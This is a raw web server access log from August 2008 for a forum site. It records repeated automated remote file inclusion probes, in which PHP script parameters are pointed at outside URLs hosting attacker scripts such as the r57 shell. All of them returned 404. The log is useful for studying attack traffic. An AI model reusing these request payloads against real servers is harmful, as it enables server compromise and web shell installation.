84.21.71.133 - - [10/Aug/2008:19:54:09 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:19:54:26 -0700] "GET /errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:19:54:26 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:54:40 -0700] "GET /logs/access_080324.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:54:40 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.248.222.82 - - [10/Aug/2008:19:55:09 -0700] "GET //include/write.php?dir=http://fotofoto.us/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.248.222.82 - - [10/Aug/2008:19:55:18 -0700] "GET /logs/access_080331.log//include/write.php?dir=http://fotofoto.us/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.248.222.82 - - [10/Aug/2008:19:55:18 -0700] "GET //include/write.php?dir=http://fotofoto.us/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.248.222.82 - - [10/Aug/2008:19:55:18 -0700] "GET /logs//include/write.php?dir=http://fotofoto.us/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.248.222.82 - - [10/Aug/2008:19:55:31 -0700] "GET /logs/access.log//include/write.php?dir=http://fotofoto.us/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
80.248.222.82 - - [10/Aug/2008:19:55:31 -0700] "GET //include/write.php?dir=http://fotofoto.us/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
80.248.222.82 - - [10/Aug/2008:19:55:32 -0700] "GET /logs//include/write.php?dir=http://fotofoto.us/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
70.85.102.132 - - [10/Aug/2008:19:56:17 -0700] "GET /logs/errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.collegiateforum.org"
70.85.102.132 - - [10/Aug/2008:19:56:17 -0700] "GET /errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.collegiateforum.org"
80.248.222.82 - - [10/Aug/2008:19:56:25 -0700] "GET //include/write.php?dir=http://fotofoto.us/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:19:56:26 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:19:56:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:19:56:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:19:57:32 -0700] "GET /oneadmin/calendar/include.php?path[docroot]=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:19:57:32 -0700] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla